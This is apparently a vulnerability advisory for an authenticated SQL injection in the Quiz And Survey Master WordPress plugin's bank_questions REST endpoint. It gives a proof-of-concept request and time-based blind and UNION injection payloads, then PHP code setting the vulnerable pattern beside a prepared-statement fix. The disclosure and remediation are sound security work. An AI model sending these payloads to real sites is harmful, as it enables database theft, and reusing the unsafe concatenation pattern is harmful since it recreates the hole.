While confirming https://wpscan.com/vulnerability/3b52b25c-82a1-41c7-83ac-92e244f7c5ab, another SQLi issue was identified and reported. The qsm_rest_get_bank_questions() function in the php/rest-api.php file did not properly sanitise and escape the category parameter before using it in SQL statements passed to the get_row() and get_results() DB calls, allowing users with the edit_post capability (author+) to perform SQL injections. Other SQLi issues were also identified by the WordPress plugin team.
GET /wp-json/quiz-survey-master/v1/bank_questions/1?category=a'%20AND%20(SELECT%201950%20FROM%20(SELECT(SLEEP(5)))ckOq)--%20IYpy HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-WP-Nonce: 2d1236068d
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [account with edit_post capability (author+)]

---
Parameter: category (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=a' AND (SELECT 1950 FROM (SELECT(SLEEP(5)))ckOq)-- IYpy

    Type: UNION query
    Title: Generic UNION query (NULL) - 27 columns
    Payload: category=a' UNION ALL SELECT NULL,NULL,CONCAT(0x71767a7871,0x4c65426b7873415142526c6e6c726a61504b4976786f5a7850744a6a78527a69667a486964675262,0x7176786271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
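The root cause above is a request parameter spliced into SQL text. As an added illustration (not the plugin's own code), the following shows that unsafe pattern beside the hardened form that binds the value through $wpdb->prepare(); the table name, column name and function names are assumptions for the example.

```php
<?php
// Added example, not code from the Quiz And Survey Master plugin.
// Table and column names below (example_questions, category) are assumptions.

// Unsafe pattern: the raw ?category= value is interpolated into the query, so a
// single quote in the parameter changes the SQL structure (the advisory's finding).
function qsm_example_bank_questions_unsafe( WP_REST_Request $request ) {
    global $wpdb;
    $category = $request->get_param( 'category' );
    $sql = "SELECT * FROM {$wpdb->prefix}example_questions WHERE category = '" . $category . "'";
    return $wpdb->get_results( $sql ); // vulnerable: user input becomes SQL
}

// Hardened pattern: the value is passed as a %s argument to $wpdb->prepare(),
// which quotes and escapes it, so it is only ever compared as a string.
function qsm_example_bank_questions_safe( WP_REST_Request $request ) {
    global $wpdb;
    $category = sanitize_text_field( (string) $request->get_param( 'category' ) );
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}example_questions WHERE category = %s",
        $category
    );
    return $wpdb->get_results( $sql );
}

// For a LIKE filter, also neutralise % and _ with esc_like() before binding,
// so user input cannot widen the match beyond the intended category.
function qsm_example_bank_questions_like( WP_REST_Request $request ) {
    global $wpdb;
    $category = sanitize_text_field( (string) $request->get_param( 'category' ) );
    $pattern  = '%' . $wpdb->esc_like( $category ) . '%';
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}example_questions WHERE category LIKE %s",
        $pattern
    );
    return $wpdb->get_results( $sql );
}

// Route registration (assumed route name): the permission_callback limits the
// endpoint to the intended capability, but does not replace prepared statements.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/bank_questions/(?P<id>\d+)', array(
        'methods'             => 'GET',
        'callback'            => 'qsm_example_bank_questions_safe',
        'permission_callback' => function () {
            return current_user_can( 'edit_posts' );
        },
    ) );
} );
```

The capability check explains why the advisory requires an author+ account, while the prepare() call is what removes the injection itself.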
2021-03-26 (about 2 years ago)